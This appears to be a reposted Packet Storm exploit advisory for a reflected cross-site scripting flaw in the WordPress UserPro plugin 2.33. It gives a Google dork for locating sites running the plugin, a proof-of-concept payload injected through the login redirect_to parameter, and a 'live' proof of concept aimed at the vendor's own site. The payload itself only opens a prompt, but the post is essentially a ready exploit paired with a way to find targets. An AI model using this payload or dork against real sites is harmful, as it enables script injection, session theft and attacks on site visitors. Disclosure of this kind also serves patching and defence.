WordPress UserPro 2.33 Cross Site Scripting

Posted on Posted in Exploit

WordPress UserPro plugin version 2.33 suffers from a cross site scripting vulnerability.

Quelle: Packet Storm


 

# Exploit Title: WordPress Plugin: UserPro XSS Vulnerability 
# Google Dork: inurl:wp-content/plugins/userpro/
# Date: 27 May 2015
# Exploit Author: FaisaL Ahmed (rEd X)
# Author Homepage: http://faisalahmed.me/
# Vendor Homepage:http://userproplugin.com/userpro
# Software Link: http://codecanyon.net/item/userpro-user-profiles-with-social-login/
# Version: Version 2.33 (latest)
# Tested on: Windows 7, Windows 8
# CVE : N/A# Greets: Sufyan Mughal | Hasan Shahriyar | Tarek Siddiki | Crystal V1P3R | 3xp1r3 Cyber Army

Vulnerable Area: login/?redirect_to=[XSS Payload]

POC:http://sitename.com/login/?redirect_to="><img src=x onerror=prompt(document.domain)>
Live POC (in vendor homepage):http://userproplugin.com/userpro/profile/?redirect_to="><img src=x onerror=prompt(document.domain)>
Screenshot:http://prntscr.com/79u7ew
Thanks
Facebooktwittergoogle_plus